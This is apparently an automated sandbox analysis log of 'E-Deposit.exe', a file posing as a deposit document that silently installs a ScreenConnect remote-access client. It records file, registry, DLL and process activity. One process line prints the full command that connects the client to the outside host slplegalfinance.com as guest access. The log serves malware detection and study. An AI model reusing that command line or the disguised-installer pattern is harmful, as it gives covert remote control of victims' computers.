                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Reads the System eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Detected potential unwanted application
                                  Source: E-Deposit.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 7_2_05CB01F0 CreateProcessAsUserW,7_2_05CB01F0
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d35c.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID57F.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID590.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7B3.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d35e.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d35e.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ngzwv2nr.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ngzwv2nr.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\u2cov4vk.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\u2cov4vk.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vtho1xxc.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vtho1xxc.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ovekkuwe.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ovekkuwe.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\isbgtems.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\isbgtems.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cj0gwio1.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cj0gwio1.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rn2gncqb.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rn2gncqb.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\bweik44o.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\bweik44o.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rapy2x3w.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rapy2x3w.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3xs004yw.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3xs004yw.newcfgJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\scdm2p5m.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\scdm2p5m.newcfgJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID590.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 7_2_017BD6F87_2_017BD6F8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6270088_2_00007FFD9B627008
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6211248_2_00007FFD9B621124
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B936E7A8_2_00007FFD9B936E7A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B935D618_2_00007FFD9B935D61
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1697957314.0000000005A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.000000000100F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.000000000100F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1712436337.000000000816D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1697594749.00000000059C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1677953094.0000000003370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000002.1683762590.00000000045CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
                                  Source: E-Deposit.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
                                  Source: E-Deposit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.E-Deposit.exe.ae63d4.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.E-Deposit.exe.59c0000.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal66.evad.winEXE@15/65@1/1
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E-Deposit.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: E-Deposit.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: E-Deposit.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: E-Deposit.exeReversingLabs: Detection: 26%
                                  Source: E-Deposit.exeVirustotal: Detection: 31%
                                  Source: E-Deposit.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: E-Deposit.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile read: C:\Users\user\Desktop\E-Deposit.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\E-Deposit.exe "C:\Users\user\Desktop\E-Deposit.exe"
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"Jump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
